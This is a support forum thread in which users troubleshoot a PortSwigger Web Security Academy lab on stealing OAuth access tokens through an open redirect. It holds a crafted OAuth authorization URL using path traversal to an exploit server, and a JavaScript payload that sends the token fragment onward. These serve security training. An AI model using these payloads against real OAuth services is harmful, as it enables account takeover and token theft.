Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Stealing OAuth access tokens via an open redirect

TIZEE | Last updated: Jan 21, 2023 02:03PM UTC

https://0a5900c503a255e2c0a2ed1f02a7003c.web-security-academy.net/auth?client_id=bafv9dae8qp24om34rrbm&redirect_uri=https://0a0000a2035e554ec06eef8d00b00056.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ad500a503b35524c06deebc01e700fb.exploit-server.net/exploit&response_type=token&nonce=399721827&scope=openid%20profile%20email This lab shows client error:forbidden,is something wrong in this lab? I ve been trying for 6 hrs and still it shows like this.

Michelle, PortSwigger Agent | Last updated: Jan 23, 2023 03:27PM UTC

I've just been testing this out, and I've not come across the same issue yet. If this is still happening, can you tell us more about the steps you're taking?

Jan | Last updated: Sep 25, 2023 07:02AM UTC

I'm having 2 issues when trying to solve this lab. 1. I am not able to complete the full authentication flow of the lab because of the default CORS policy. "Access to fetch at 'https://[OAUTH-SERVER-ID]/me' from origin 'https://[LAB-SERVER-ID]' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: The 'Access-Control-Allow-Origin' header has a value 'https://fcbz.com' that is not equal to the supplied origin." This is on Chromium Version 117.0.5938.62 (Official Build) (arm64) and Firefox 117.0.1 . 2. Exploit server urls are never visited by an IP other than my own when delivering to victim, no matter what url or headers i provide.

Michelle, PortSwigger Agent | Last updated: Sep 25, 2023 10:04AM UTC

Hi Do you have any extensions enabled? Maybe Param Miner? If so, if you disable it, do you see the same issues?

nejigenius | Last updated: Jun 27, 2024 07:37AM UTC

<script> if (!document.location.hash) { window.location = 'https://oauth-0a3100f70481e50880c679a0027c0040.oauth-server.net/auth?client_id=pwfawrjz6wozrblc7kiwn&redirect_uri=https://0a4300a6044ae536804b7bbb00110027.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ac400bb0458e5e980b57a22015a00dd.exploit-server.net/exploit/&response_type=token&nonce=-1360471060&scope=openid%20profile%20email' } else { window.location = '/?'+document.location.hash.substr(1) } </script> I've been struggling with a couple of lab exercises. In one of them, I've got a payload that seems to work fine when I use the "View exploit" option. But when I try to actually deliver it by clicking "Deliver", nothing happens. I've checked the logs, and I don't see any IP addresses showing up except my own. I'm having a similar issue with another lab called "OAuth account hijacking via redirect_uri". For the past two days, I just can't get the payload to deliver to the victim's system. I've tried troubleshooting by resetting the labs, waiting for about 20-30 minutes, and then starting them up again. But so far, nothing's worked. I'm really not sure what I'm doing wrong here, and it's pretty frustrating. Any ideas on what might be causing this or how I can fix it?

Ben, PortSwigger Agent | Last updated: Jun 27, 2024 08:00AM UTC